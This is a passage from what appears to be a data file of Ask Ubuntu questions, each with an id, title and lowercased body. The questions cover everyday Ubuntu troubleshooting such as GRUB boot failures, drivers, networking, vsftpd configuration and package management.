boot menu ) the command generated by `` update-grub '' , i see : recordfail insmod part_msdos insmod ext2 set root= ' ( hd4 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set < the correct uuid > linux /boot/vmlinuz-2.6.35-28-generic root= < the correct uuid > ro quiet splash initrd /boot/initrd.img-2.6.35-28-generic so the working command says `` set root=hd5,1 '' and the failing one `` set root= ' ( hd4 , msdos1 ) ' '' . as you might expect , after i boot ( using pm ) , when i look at the /etc/grub.d/00_header section of /boot/grub/grub.cfg , i see set root= ' ( hd4 , msdos1 ) ' in several places . but it sure seems like it should be ( hd5 , msdos1 ) or ( hd5 , 1 ) or something with a 5 somewhere . so why might update-grub be pointing to the wrong disk ? i have 4 bulk storage disks ( mounted as sda/b/c/d ) before this one - none of them are marked bootable ( according to gparted ) . my os drive/partition is mounted as sde/sde1 , and the partition magic usb stick ( when it 's attached ) is sdf/sdf1 . so i do n't believe my system drive is changing locations from hd4 to hd5 depending on whether or not my usb stick is inserted - the drive locations seem stable . any help appreciated !
32135	stuck on grub command line	i am running natty alpha 3 . i used update manager to install something ( not sure what it was ) , then i restarted , but instead of listing all the kernels , it gave me a command line . i do n't know what happened and how to use it . help !
32137	how do i connect to cisco valet plus wireless internet router ?	i was wondering if it is possible to connect to a cisco valet plus wireless internet router with ubuntu 10.10 . the easy setup key that comes with the router does not support ubuntu according to the faq that comes with the setup key , and i also tried running the executable on the setup key with wine , but that also failed . the network is detected in ubuntu 10.10 , but when the wireless password is entered into the standard ubuntu internet connection area , a connection fails to establish . any suggestions as to how it might be possible to connect to this router ? thanks in advance !
32138	how to enable generic microphone with an alc 880 sound card ?	i have an external microphone plug in the back of my tower with a alc 880 sound card . my sound for the speakers works great . but when i try to use my microphone in google talk or skype , no one can hear at the other end . any help would be appreciated .
32139	remove text information from a pdf ?	i printed a recent credit card statement straight to pdf and used pdfedit to black out ( highlight in black ) the information i 'd prefer not to share with the party i need to send this to . now i ca n't seem to find a way to save the document so that the text is n't there , hiding under the black bars . i tried to flatten it , but that has n't resolved the issue . i tried printing to pdf , but the text information is all preserved . i tried opening it in ooo writer and i get an error . is there a method available to me ( in 10.04 ) to save the pdf as an image , functionally ? i thought `` flattening '' would achieve that but i 'm obviously missing something .
32140	could ask ubuntu run on ubuntu + mono ?	inspired by the old hacker news conversation about this webiste , i 'm wondering : could ubuntu and mono run an asp.net mvc website like ask ubuntu ? the technology is the focus here instead of the site . could you replace iis , asp.net , mvc , etc with free and open source technologies without having to completely redevelop the site ? note from oli : the meta-discussion ( that is : will ask ubuntu migrate to ubuntu+mono ? ) has been moved to a separate question in the meta portion of the website
32149	google desktop logo looks bad	the google desktop icon in the system tray in unity looks ugly : any way around this ?
32151	plugins missing in firefox 4 whith dual 3.6 & 4 installed	i have installed both firefox 3.6 and 4 in my 10.04 x64 ubuntu , i just downloaded the .tar.gz from the firefox page and started it up using a different firefox profile so it did n't share file between firefox versions . now i have been unable to use the 3.6 plugins on the 4 install , i managed to install flash using flash-aid , but now i want to use the gmail voice plugin which works without problem on 3.6 but is never recognized as installed on 4. in what folder is firefox 4 looking for the plugins ? is there an extra step to register the plugins besides creating a symbolic link to the .so file ?
32152	who makes laptops for ubuntu ?	i 'm looking for a laptop and would like to avoid the whole 'is this [ specific configuration of hardware ] compatible with ubuntu ? ' process by finding a laptop manufactured with ubuntu in mind . i know of system76 , but are there any other manufacturers making laptops built to run a standard build of ubuntu ? i 'm not counting dell , as - from my experience - their 'ubuntu ' laptops/netbooks require their build , and because of that have their own set of compatibility issues . update : and as mentioned in the comments , dell is no longer selling systems with ubuntu to consumers .
32153	formulae created in excel not working in openoffice	i am trying to open some microsoft office files in which there are formulae which are apparently copy pasted and therefore can be separated from the written rest . the problem is , these formulae do n't seem to exist with openoffice , any suggestions ?
32161	how do i get synapse to search my tomboy notes ?	in this bug report https : //bugs.launchpad.net/synapse-project/+bug/683550 it says '' tomboy has a dataprovider for zeitgeist , so if you have that tomboy notes should be easily searchable using synapse '' i 've got the zeitgeist ppa from here : https : //launchpad.net/~zeitgeist/+archive/ppa ? field.series_filter=maverick . i installed the package zeitgeist-datasource-tomboy , but still can not get tomboy notes in synapse 's search results . how do i get it to work ?
32164	what does a keyring do ?	i know how to disable it , circumvent it , and that it saves stuff . however , when asked `` what is it for , why is it there , and how does it work '' i 'm at a loss for words . what 's more disturbing is there does n't seem to be much of anything content-wise for those questions on the internet . so once and for all . what is a keyring , why is it on my computer , and how does it work ?
32166	how to fix the google desktop logo in the notification area ?	related : google desktop logo looks bad in my previous question i was helped to solve this appearance problem , thought this is solved : i still do n't really like how it looks since the white contrasts too much . is it possible to change this image , so that it looks like this : thanks @ desgua for the artwork i do clarify that i just want in working for this ( ) background color . thanks in advance !
32168	why does skype notification icon show up in unity while opera and indicator-weather do n't ?	the only thing i really miss in unity is being able to have the notification/indicator icons available i choose . i always have a little cpu indicator , weather , opera and skype available , but in unity the only one working is strangely enough skype . not even hplipgui 's notification icon shows up . what determines what works , and is there a way i can add the ones that do not show up ?
32172	i ca n't login in vsftpd with virtual users	ubuntu 10.04 32 bits vsftpd 2.3.4 installed from sources # cat vsftpd.conf listen=yes anonymous_enable=no local_enable=yes write_enable=yes anon_upload_enable=no anon_mkdir_write_enable=no connect_from_port_20=yes nopriv_user=ftp chroot_local_user=yes secure_chroot_dir=/usr/share/empty ls_recurse_enable=yes listen_port=1031 log_ftp_protocol=yes syslog_enable=no vsftpd_log_file=/var/log/vsftpd.log delete_failed_uploads=yes user_config_dir=/etc/vsftpd/user_conf anon_world_readable_only=no anon_other_write_enable=no no_anon_password=yes force_dot_files=no guest_enable=yes pam_service_name=vsftpd.virtual virtual_use_local_privs=yes # cat /etc/pam.d/vsftpd.virtual auth required /lib/security/pam_userdb.so db=/etc/vsftpd/virtual_users.db account required /lib/secutiry/pam_userdb.so db=/etc/vsftpd/virtual_users.db i use db_load to create a simple hashed db with the following command : db4.8_load -t -t hash -f logins /etc/vsftpd/virtual_users.db well , i can login with my system user and it enters in ftp folder . but when i try to enter with virtual user always it shows : 530 login incorrect . i 've tried with other tutorial ( http : //www.ubuntututorials.net/installing-vsftpd-using-text-file-for-virtual-users/ ) that uses htpasswd and libpam-pwdfile but it also does n't work . i 've tried see the log files but neither shows anything . i 've done several searches with grep -i vsftpd /var/log/* and grep -i pam /var/log/* but i do n't find any clue .
32178	how can i build a website without 'coding ' knowledge ?	i have a ubuntu server network & have decided to make a website . can anyone suggest some free tools that will help me do this without having to code html or css ?
32179	two ethernet ports on motherboard . how can i get double the bandwidth ?	direct question : my evga classified motherboard has two ethernet ports . i want to use them simultaneously to improve the speed of a remote connection . ( yay for programming remotely ) . how do i do this ? at present /etc/network/interfaces : auto lo eth0 eth1 iface lo inet loopback iface eth0 inet static address 192.168.1.202 netmask 255.255.255.0 gateway 192.168.1.2 ifrace eth1 inet static address 192.168.1.201 netmask 255.255.255.0 what should i change ? is there a package i need to install to bond the two channels . background : i do a lot of remote computing both from home to office and office to home . but ( to take my isp out of the equation ) , let 's frame the question as if i 'm really just interested in maximizing the file transfer rate between two computers on the same ( local ) network . both boxes have dual ethernet motherboards . using a simple linksys wrt54gs as a 5 port switch ( ignore wireless and isp ) -- how do i maximize the transfer rates between the computers ? please note : i 'm not interested in load balancing -- correct me if i 'm wrong , but i want to bond the two channels together so that the box appears as if it has one connection that 's twice as fast .
32182	evolution calendar sync with ubuntuone ?	i 'm assuming this is a feature what will be added in the future for mobile paying customers ? i know this feature would be very appealing to users wanting to move away from windows/outlook and start using ubuntu/evolution ... keep up the great work ! !
32189	what are the implications of the ffmpeg / libav fork for users ?	the ffmpeg project got forked : http : //libav.org/ http : //ffmpeg.org/ libav has already been added to the ubuntu repositories : https : //launchpad.net/ubuntu/+source/libav what are the implications of the ffmpeg / libav fork for a ubuntu user ?
32191	how do i remove cached .deb files ?	i think once we get the packages with apt-get it stores in /var/cache/apt/archives . is it safe to remove the archives files to save space ? can we remove other files as well to save some space ?
32192	drag & drop files and items in unity !	how can i drag and drop files ( media files specifically ) in my unity . while playing videos or music , if i like to drop another file in the totem/vlc media player , how to do it ?
32197	no space left on device	i was getting no space left on device , so i removed some of the files . but again when i try to update my folder with svn update i am getting the same error . is this the problem with space left ? when i run df -k i get and when i run df -i , i get it seems like the system has ran out of inode space as you suggested even though i have the space left in my disk . how do i fix this ?
32199	split a text file into two files , without losing revision history ?	so say i have file.py that i want to split into file1.py and file2.py . what is the correct way to do this ? would it be to use the following ? bzr copy file.py file1.py bzr copy file.py file2.py bzr rm file.py
32202	is 64 bit ubuntu stable for general use ?	are there still general problems using the ubuntu 64bit version ? i heard that most of the programs do not work out of the box ? will i notice a significant speed-boost ? until now i have always used ubuntu 32 bit .
32206	using recursion with a command loop . what 's the syntax ?	i use the following loop to do .flac -- > .mp3 transcoding : for file in *.flac ; do $ ( flac -cd `` $ file '' | lame -- preset fast extreme - `` $ { file % .flac } .mp3 '' ) ; done the directory , of course , must contain .flac files for this to work . what i 'd like to be taught is the syntax in order to make this command work recursively . the aim is to cd to the directory containing all the subdirectories of .flac files and have the command loop through them all . thanks a lot in advance .
32209	how to add a new screen resolution for nvidia ?	how can i add more screen resolutions to thinkpad ( w510 ) lcd ? i want to clone the external display which has a bit different sets of resolutions . the best resolution that is common to both displays is quite low . in the past i used to have an ati card so i used xrandr to add a new resolution , but somehow it does not work for my new machine which uses nvidia . hints anyone ? i 'm using a very simple ( default ) xorg.conf file : section `` screen '' identifier `` default screen '' defaultdepth 24 endsection section `` module '' load `` glx '' endsection section `` device '' identifier `` default device '' driver `` nvidia '' option `` nologo '' `` true '' endsection
32212	i ca n't get the directory contents to not be listed when viewing localhost/mysite	i have localhost/mysite/logs as password protected and it works using .htaccess and .htpasswd , but additionally i would like to have localhost/mysite to not list directory contents . i 've tried doing this in /etc/apache2/apache2/apache2.conf : < directory `` /www/var/mysite '' > options -indexes < /directory > currently i have this in /etc/apache2/sites-available/default : < directory /var/www/ > options indexes followsymlinks multiviews allowoverride all order allow , deny allow from all < /directory > i can get around this by putting a blank index.html in /var/www/mysite but what is the other way using options -indexes ? ( i got from some where else that by default all files under /var/www ignore the .htaccess file so i changed the allowoverride none to all in /etc/apache2/sites-available/default )
32225	does totem apply replaygain ?	i 'm trying to use replaygain to change the volume of some mp3 files , but although i seem to have changed the file successfully ( i used easymp3gain-gtk and mp3gain , and i checked the file with mp3gain -s c ) , totem does not play the files with any difference in volume . i know totem uses gstreamer , but i do n't know how to check if totem has recognised and is applying the replaygain . how can i check if totem is correctly reading and applying the replaygain ? are there totem or gstreamer commands that allow me to check ?
32228	how can i remove all default installed games ?	i want to remove all the games that are installed by default . how can i do it all at once ?
32229	10 things to do after installing 10.10	just as the title says in your own opinion list the top 10 apps i should install after a fresh ubuntu install . please i need as many responses as possible ( apps , tweaks , update etc )
32231	how can i remove the evolution package completely ?	how can i remove evolution and all related packages ? i feel like i do n't need them .
32238	find package name using terminal	hello i want to remove software ( for example transmission ) using terminal . how can i find the package name for the software ?
32241	how can i accelerate my radeon 9200 graphic card ?	i installed a ppc port of ubuntu 10.10 on my rather old emac ( g4 , 1.25 ghz ) . so far i have a good impression so far , but the graphics do n't seem to be really supported out of the box although there is a driver preinstalled i guess . is there a way i can accelerate my radeon 9200 ? when i move a window it has a trace and things get slow when there are other windows running in the background . besides i can get no fancy but useful effects like dropshadows and transparency . not very sexy : ( im not a very experienced linux user , so if you want me to provide some more information about the output of some commands ( ... i do n't know yet ) please let me know . hope you can help me , thx in advance .
32242	how to compile and run c program	i have installed gcc compiler using install the build-essential command . after the installation i wrote a simple c prgm . i tried to run with following command : gcc first.c ./a.out but i 'm getting `` bash : ./a.out : permission denied `` message . i do n't know what to do now .
32246	how to secure ubuntu server from bruteforce ssh attacks ?	i have my passwords secure , but i heard people complaining about perfomance of a server going down drastically when a bruteforce attack is taking place . how can i secure my ubuntu 10.10 server from such attacks ? is there an apparmor profile for this ? or some other way to address it ?
32248	how to de-brand ubuntu ?	i am working on an ubuntu mod , and i would like to change the name/splash screen/login screen/etc in order to make it a more customized environment . i 've been able to change all of the names shown via the terminal , but no luck as of yet using gconftool-2 to change anything else . am i missing something ? this is what i have so far - https : //github.com/seanmrice/6buntu-mod
32249	monitor not detected so i have a resolution problem	i installed ubuntu in an old pc and the problem is that ubuntu is unable to detect my monitor which is samsung syncmaster 591s . when i go to system - > preferences - > monitor , there is no option to change the resolution and it is set to 800 * 600 . which looks utterly ugly . here is a screenshot there are no options in resolution , refresh rate , rotation listed in the monitor preferences other than shown in the screenshot . i do n't have any graphic card installed . its a dual boot system with windows xp and , xp has perfectly fine resolution . here is the output of lspci , if it helps varun @ varun-desktop : ~ $ lspci 00:00.0 host bridge : intel corporation 82845g/gl [ brookdale-g ] /ge/pe dram controller/host-hub interface ( rev 03 ) 00:02.0 vga compatible controller : intel corporation 82845g/gl [ brookdale-g ] /ge chipset integrated graphics device ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801db/dbl/dbm ( ich4/ich4-l/ich4-m ) usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation 82801db/dbl/dbm ( ich4/ich4-l/ich4-m ) usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation 82801db/dbl/dbm ( ich4/ich4-l/ich4-m ) usb uhci controller # 3 ( rev 02 ) 00:1d.7 usb controller : intel corporation 82801db/dbm ( ich4/ich4-m ) usb2 ehci controller ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev 82 ) 00:1f.0 isa bridge : intel corporation 82801db/dbl ( ich4/ich4-l ) lpc interface bridge ( rev 02 ) 00:1f.1 ide interface : intel corporation 82801db ( ich4 ) ide controller ( rev 02 ) 00:1f.3 smbus : intel corporation 82801db/dbl/dbm ( ich4/ich4-l/ich4-m ) smbus controller ( rev 02 ) 00:1f.5 multimedia audio controller : intel corporation 82801db/dbl/dbm ( ich4/ich4-l/ich4-m ) ac'97 audio controller ( rev 02 ) 01:01.0 modem : pctel inc hsp56 micromodem ( rev 04 ) 01:05.0 ethernet controller : realtek semiconductor co. , ltd. rtl-8139/8139c/8139c+ ( rev 10 ) varun @ varun-desktop : ~ $ ps : i looked into older questions regarding this issue on au but they do n't seem to help .
32251	password change does not work using gui	i have been trying to change my password now for a while , and every single time i get an error . here 's what i have tried so far : passwd in terminal - i get a message saying the password has been changed successfully , but when i have to use it anywhere else , to login or to authenticate a change the new password does n't work ; i have to use the old one . system > users and groups - when i use this to change the password , the password change dialog box grays out after i enter the new password and remains that way . i can close the window , but the password does n't get changed . any idea what could be wrong or how to solve this ? might have to file a bug in launchpad otherwise . fyi , i 'm using 10.10 netbook edition . update : included answer to how i solved problem . however , the problem with being unable to update passwords using the gui 'users and groups ' remains . the dialog box goes gray and password remains unchanged . any idea why this could be happening / anyone else facing this ?
32255	how can i see a list of all my shared folders ?	sometimes i find directories that i left shared a long time ago but forgot to un-share . is there a way to see a list of all my shared folders so i can remove folders that i no longer need to be shared ? i 'm using maverick meerkat .
32257	how to fix broken grub after already having tried to repair it ?	i recently added another partition to my hardrive where ubuntu was installed to and afterwards when i booted ubuntu i got sent to the grub rescue > terminal . the fix for that was that i had to reinstall grub on the correct partition for ubuntu to boot again . so i followed all the instructions from ubuntu to fix it from the live cd here https : //help.ubuntu.com/community/grub2 # reinstalling % 20grub % 202 . after i was done doing that i rebooted and the grub > terminal is now there . i would usually see a list to choose from with my os but im guessing i have to update grub when i reboot or load the menu list . the problem is i did a lot of research to figure out how to boot from grub > but i can not find a way to do so . it is not easy finding a tutorial for doing so and i am completley stuck . i would like to know an easy way to boot into my ubuntu from grub and making the booting as it was before i made the partition . please any help would be greatly appreciated for i need to get on my ubuntu to start doing some work ...
32258	how to hide gnome panels ?	i want to hide ubuntu panels completely in my ubuntu 10.10 . is there a way to do this via gconf-editor ? so that i can retrieve it later if i need . i do n't prefer to use auto hide option . is there any other way ?
32260	splitting channel list in irssi ?	alright , i have been reading the documentation i do n't know if i missed it but how can i put the channel list ( the people in the channel ) to the right side like this theme here
32261	how can i add ubuntu to a windows domain ?	i have installed likewise-open , but when i add an ubuntu machine ( 10.10 ) to a domain , i am getting the following error : leaving ad domain : xxx.xx.xxx` error : lsass error [ code 0x00080047 ] 1387 ( 0x56b ) error_no_such_member - unknown error can someone sort this out ? likewise-open shows me as being connected to domain . but how do i verify this ? ad is managed by a windows 2003 server . i tried red 's answer but it did n't work . root @ karthick : ~ # domainjoin-cli join xxx.xx.com xxxxxxx joining to ad domain : xxx.xx.com with computer dns name : karthick.xxx.xx.com xxxxxxx @ xxx.xx.com 's password : error : lsass error [ code 0x00080047 ] 31 ( 0x1f ) error_gen_failure - unknown error likewise-open gui is already installed , but i am not able to leave the domain and re-join . see the following screen shot : i searched google and i came up with this . is that a problem ? or can anyone help me to debug the cause ?
32263	how to exclude a subtree from the find command	so i 'm trying to find all the mercurial repositories in my home directory $ find ~ -name `` .hg '' -or -name `` .git '' this works fine , but it finds a lot in the ~/.local/share/trash subdirectory how do i make it ignore these ? obviously there 's grep -v , but it would be better not to search trash at all .
32268	is their an application to extract data from files ?	i want to extract data from large group of files based on a regular expression . is their an application , script , batch or terminal command to do this ?
32272	why does ubuntu only show 3gb of ram ?	i have an asus g50vt-x5 laptop with 4gb of ram installed . but ubuntu 10.10 shows only 3gb of ram . why is it only showing 3gb of ram instead of the full 4gb ? output of free command is : neal @ ubuntu : ~ $ free total used free shared buffers cached mem : 3095668 2972784 122884 0 747996 1590044 -/+ buffers/cache : 634744 2460924 swap : 0 0 0
32276	are there any good typing tutors ?	are there any good typing tutor applications available for ubuntu ?
32280	mouse wheel jumpy on scrolling	i have a small issue that 's really annoying me and wondering if there is a possible fix for it . im using the latest distro of ubuntu 10.10 and when scrolling up and down pages , especially in google chrome ( also within folders etc ) the page flickers up and down as i scroll . there is no issue with the mouse itself as it works fine in other operating systems , but in ubuntu 10.10 it just lacks smoothness as well as it being jumpy . to describe exactly how it just imagine that the page has 20 scroll jumps , you would normally scroll the mouse wheel once and it would go exactly one step down the page , but if i scroll about 5 clicks , it will jump back and forth . hope you can understand and can help me resolve this pain in the ...
32281	how to change touchpad behaviour in chromium/firefox ?	i have asus laptop which has two finger scrolling , and it works out of the box . when i am using firefox or chromium in kubuntu , middle click by external mouse on any of the link opens that link in new tab . same behaviour is achieved if i tap with my two fingers on the touchpad . but in case of ubuntu if i tap anywhere with two fingers the dropdown menu appears . how should i change this behaviour of touchpad . bottomline : i want to open link in new tab with two finger tap on the hyperlink . how should i do that ?
32283	purchased software usage and multiple computers	question : if i buy a program on one computer , am i allowed to use it on both my personal computers ? info : so i 'm dyslexic and a college student . this means that i can not read very quickly and have to read a lot for classes . to help me the academic support center gives me audio recording of my books . the problem is that these are all drmed . the only way i can read them is to use windows media player in windows ( tried wine with no success ) . this is ok when i 'm on my desktop which i have duel booted into windows xp and ubuntu . but on my laptop , which i use when i 'm in the library for example , i only have ubuntu . the for purchase package `` fluendo '' ( which now that i look at it i realize is latin for `` deserving to flow '' ) looks like it should allow me to get around these drm issues and be able to read my texts more than just at my desktop . but it raises two questions for me . one , if i buy this , can i install it on both my laptop and desktop ? two , if i have to reformat my system , how do i recover this software ?
32289	activating broadcom wireless drivers in cli	the wireless card as identified by lspci : network controller [ 0280 ] : broadcom corporation bcm4318 [ airforce one 54g ] 802.11g wireless lan controller [ 14e4:4318 ] ( rev 02 ) i 'm new to ubuntu and i 've found this guide which addresses my issue exactly . i 've got internet connectivity and i just want to enable the wireless card on this old dell laptop . however , i 'm running ubuntu server 10.10 and i would rather not install a desktop . thus , i 'm stuck at the following step : step 2 . under the desktop menu system > administration > hardware/additional drivers , the b43 drivers can be activated for use . is it possible to accomplish this in the cli ?
32290	unity desktop : could n't find a perfect decorator match	i am using ubuntu 11.4 alpha3 just to test it . unity desktop loads without top panel and left dock . after some help i got this command and tried it . unity -- replace here is the output unity-panel-service : no process found libcompizconfig : dlopen : /usr/lib/compizconfig/backends/libgconf.so : can not open shared object file : no such file or directory this file is locate at /usr/lib/gnome-settings-daemon-3.0/libgconf.so checking if settings need to be migrated ... no checking if internal files need to be migrated ... no backend : ini integration : true profile : unity adding plugins initializing core options ... done initializing bailer options ... done initializing detection options ... done initializing composite options ... done initializing opengl options ... done initializing decor options ... done initializing mousepoll options ... done initializing vpswitch options ... done initializing animation options ... done initializing snap options ... done initializing expo options ... done initializing move options ... done initializing place options ... done initializing grid options ... done initializing gnomecompat options ... done initializing wall options ... done initializing ezoom options ... done initializing workarounds options ... done initializing staticswitcher options ... done initializing resize options ... done initializing fade options ... done initializing scale options ... done initializing session options ... done could n't find a perfect decorator match ; trying all decorators found no decorator to start segmentation fault ( core dumped ) how to investigate the issue and fix it .
32292	is ntfs-3g safe for writing ?	these days , i have to use the ntfs-3g driver to write to an ntfs drive ( which will later be used in windows ) . but i still remember the olde times of linux ntfs driver which clearly said in the docs : 'if you write to an ntfs volume , run our special program afterwards which will clean up the damage done . ' so , i read through the man , the docs , the tuxera site and askubuntu and found no discussion of the write-safety of ntfs-3g . the only thing that was mentioned somewhere is that the driver does n't support the ntfs journal . so , the question is , can i use ntfs-3g and be sure that i will later read what i have written to the files ? wo n't , for example , windows find the journal entries missing and 'clean up ' the data according to its own faulty understanding ?
32297	ubuntu one not connecting to the cloud service	i have subscribed to ubuntu one recently . on the account page i do see the machine i am using ( running lucid lynx 10.04 ) . but on my loal machine the tab `` ubuntu one preferences '' remains desperatly lifeless . the account tab is only listing unknown the device tab returns to disconnected after trying to connect for 3/5 minutes . do you know what should i check so as to find the trouble ? the troubleshooter hasnt happened to be uselful for now . i am gon na try the command lines for ubuntu one , not tried yet , but if you have any ideas : - )
32298	prefer a ( ipv4 ) dns lookups before aaaa ( ipv6 ) lookups	in notice my newly installed ubuntu 10.10 always does an aaaa dns lookup before a record lookups . is there any way i can configure the system to do a lookups first ? ( while various browsers and other applications might contain their own resolvers , i 'm talking about the ones in glibc )
32300	is there a way to check when the os was installed ?	i was wondering if there is a way to check the date the os was first installed . or maybe when it was first booted . i ca n't remember when i did d installation n i was just wondering if there was a way to find out .
32303	scrolling on touchpad stopped working on aao d250	im using ubuntu 10.10 since november 2010 and never had this kind of problem . look , today i just turned on my netbook and i could n't move the mouse , so i looked up for the fix and did this . sudo modprobe -r psmouse sudo modprobe psmouse proto=imps cd /etc/modprobe.d/ sudo gedit options options psmouse proto=imps the mouse began to move , but the scrolling was gone and ca n't make it work again . i hope someone can help solve this . thanks
32311	how to fix w : gpg error : ... .. no_pubkey ?	i get this message when i use update-manager : w : gpg error : http : //ppa.launchpad.net lucid release : the following signatures could n't be verified because the public key is not available : no_pubkey 9bdb3d89ce49ec21 i have no idea what 's wrong and how to fix it . could someone kindly explain what i need to do to fix whatever is wrong ? is there a way to prevent this from happening in the future ?
32317	wine wo n't install	i just reinstalled 10 - 10 on an old dell desktop w/ 3g of ram , two hard drives , one with xp pro and the other with 10-10 . a windows virus took out one drive and fouled my boot loader . i had wine installed and it worked well . after the reinstall with a new cd , wine will not install . i tied synaptic package manager , i tried to download and install from the wine web site and i tried the command line . every time i get 3/4 of the way through i get through the install i get ask to put the cd in the drive . the manager looks for a file '' pool/main/a/ auto the file ( a ) does not exist on the cd . the install hangs . my question is where can i get an iso with this file on it ?
32322	how do i define another default ssh identity ?	id_rsa is , normally a default identity . however , i 've created a new key and i would like to add that key as a default identify instead . how can we do that ? thanks a lot in advance .
32330	very slow file copy speed ( disk to disk )	i have amd athlon x2 3gb ram ddr2 two hdd one 80gb other 1tb in this computer i got only ubuntu all disk in ext4 i want to copy 10gb many file of 700mb or 1gb ( many linux iso ) the transfer is 1mb/s this is sooo slow ! i did a touch /forcefsck just in case but nothing happen it is still slow ! what might be the problem ?
32332	bzr and ubuntu one problem	so i 've got a folder with a programme i 'm working on . i 'm using bzr to keep revisions of it ... and whenever i commit to bzr it seems to create conflicts ... ooor i 'm editing the files in matlab ( ok it 's not a real programme but whatever ) and i 'm not sure if this causes the problem ... . any suggestions ?
32335	can a wine app access files outside of the wine drive_c environment ?	i am running avisynth witih avidemux+avsproxy in wine , but the files which avisynth needs to access via its .avs scripts must be in windows format ( eg . `` c : \my\avisynth.avs '' ) . most of the files i want to access are not in wine 's drive_c ... is there some way to address my home directory , and other drives/directories ? .. eg . as drive_d..drive_n perhaps ?
32337	hotkey combinations for window management ?	what is the most useful hotkeys on ubuntu desktop ? ( for show all windows at the same time , change between programs , ... )
32345	cache of a file editing by gedit on a mounted ftp ?	i was working on a file live by editing changes to a file on ftp by mounting the ftp on ubuntu and using gedit to make changes . after work , i shut down my machine and now i realize that the file on ftp has been wiped of its content . any ideas if gedit might have a cache copy of it ?
32346	spread only windows of the current application	i want the same effect as with super + w but for only the selected windows . is this possible to achieve this ?
32347	hyper-v and ubuntu 10.04 apt-get update	i have issues with 10.04 and 10.10 servers . i 'm trying to do apt-get update command , but it is stuck on get . there is some solutions in here : apt-get update stuck on `` waiting for headers '' . i added this acquire : :http : :pipeline-depth= '' 0 '' to /etc/apt/apt.conf.d/piplining-off.conf and it worked fine then . is there have been similar problems with hyper-v and ubuntu 10.04/10.10 ? thank you for your answers
32350	login problem	i can not enter to the normal login interface.. if i do it will enter into tty1 mode.. i just can enter using recovery mode ... how can i solve this problem ? ? ?
32351	forcing a `` hard '' screen resolution resize	i have this weird monitor , that every now and then goes into what i call 'green-mode ' . it 's kind of hard to describe what that is , but when it does , alot the pixels go `` green '' and the image becomes blurry , sort of . i 've confirmed this to be an error in the monitor , and not the gfx card . i can get it to snap out of 'green-mode ' and go back to being completely normal by either logging out and back in again , or by switching user . for a long time ( running windows ) i was able to achieve the same effect , simply by changing the resolution forth and back . this has previously worked in ubuntu , but it does n't any longer . i 've had the same thing happen in windows , where it 's normal resolution resizer , didnt do the job , but then after an update , it worked again . i 'm running nvidia drivers . is there anyway to get ubuntu doing the same ? it feels as if the resizing isnt done `` hard '' - you can sort of tell if the entire screen goes black while resizing , or if it just resizes .
32354	keyboard mouse problem	i just installed ubuntu on my laptop ( core 2 duo sony vaio ) and am having a problem with the external keyboard and mouse . when i first logged in the left mouse button does not work , this can be solved by unplugging the external keyboard/mouse 's usb connector and then plugging it back in again . but then randomly other problems happen . ( shift gets stuck , keys do n't work etc ) the keyboard and mouse are a generic brand wireless ( a4 tech ) that i got for cheap . both work ok under windows so this is a major pain .
32363	what is the meaning of ~ in ~/somefolder ?	i 've been told to go to ~/.ssh and , actually , i did cd ~/.ssh and i got into it . however , i 'm wondering : what does the ~ mean in this context ?
32366	how do i get an enter usb tv box tv tuner aka gadmei utv302 to work ?	has anyone had any success in using the enter usb tv box from enter multimedia ? it comes bundled with software that works in windows . i have had no luck using it in ubuntu 10.10 . update 1 here is the output from lsusb bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 003 : id 093a:2510 pixart imaging , inc. optical mouse bus 004 device 002 : id 046d : c312 logitech , inc. deluxe 250 keyboard bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 006 : id 1f71:3301 bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub i ca n't find the enter usb tv box listed in this . in the dmesg tail command , i found something that seems to be related to the card : usb 1-5 : new high speed usb device using ehci_hcd and address 6 usb 1-5 : config 1 interface 0 altsetting 1 bulk endpoint 0x83 has invalid maxpacket 256 update 2 from windows i learned that this usb tv tuner uses some chipset from gadmei corporation . all computer stores in india sell enter usb tv box if you ask for an usb tv tuner . no other brand seems to be interested in this market . update 3 i learned that this tv tuner is rebranded version of gadmei utv302 ( usb tv tuner box ) . update 4 i tried adding em28xx as the chipset ( as suggested by user bobbo below ) for the tuner but that did not work . i went back to my pinnacle pctv internal card . i do n't think the tuner referred by ubuntuforums ( gadmei utv 330 ) and the tuner that i have ( gadmei utv 302 ) are the same . my usb tuner is several times bigger . my tuner seems to be a newer device with a newer tuner chip . i will submit details of this device to the linuxtv developers this weekend . update 5 i opened the tuner box and found that it uses a tuner from a chinese company - tenas . model is tnf 8022-dfa . update 6 tuner chip specs ( retrived from supplier directory ) for tenas tnf 8022-dfa . supply voltage : true 5v device ( low power dissipation ) control system : i2c bus control of tuning , address selection tuning system : pll controlled tuning receiving system : system pal d/k , if ( intermediate frequency ) : 38mhz receiving channels : full frequency range from channel ds1 ( 49.75mhz ) to channel ds57 ( 863.25mhz ) ; use texas instruments sn761678 ic solution , with mini install size update 7 reverse side of the circuit board . picture of the tv tuner
